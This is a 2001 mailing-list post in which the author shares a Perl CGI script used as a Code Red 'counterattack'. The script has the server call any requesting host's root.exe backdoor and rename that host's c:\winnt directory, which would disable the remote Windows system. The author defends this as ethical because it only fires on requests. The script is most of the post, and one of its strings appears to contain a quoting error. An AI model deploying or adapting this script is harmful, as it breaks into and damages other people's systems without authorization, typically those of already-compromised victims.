[Snort-users] Code Red attacks

F.M. Taylor root at ...28...
Tue Sep 18 07:50:06 EDT 2001


This is a "default.ida" script that I am using on a server somewhere.  It
seems to be working, at least some of the time.

Ethical??  Well, it is a script, on a server that I own, and the only way
it will do anything is if you try to access it.  It doesn't activly look
for anything, it just waits for a service request, and then performs the
requested service.  If you don't want this service, don't request it.

If there is a better way to deliver this service after it has been
requested (more elegant code), let me know. 



root at ...2642...:/htdocs# cat default.ida

#!/usr/bin/perl
#
$ipAddress = $ENV{'REMOTE_ADDR'};
#
$newUrl = $ipAddress."/scripts/root.exe?ren+c:\\winnt+c:\\codered\";
#
system("TERM=vt100;export TERM;lynx \'http://$ipAddress/scripts/root.exe?ren+c:\\winnt+c:\\codered\' >>codered.txt");
#
print "Content-type: text/html\n\n";
#
print "<HTML><HEAD>";
print "<META HTTP-EQUIV=\"Refresh\" CONTENT=\"0;url=http://$newUrl\">";
print "</HEAD><BODY></BODY>";
print "</HTML>";
#







More information about the Snort-users mailing list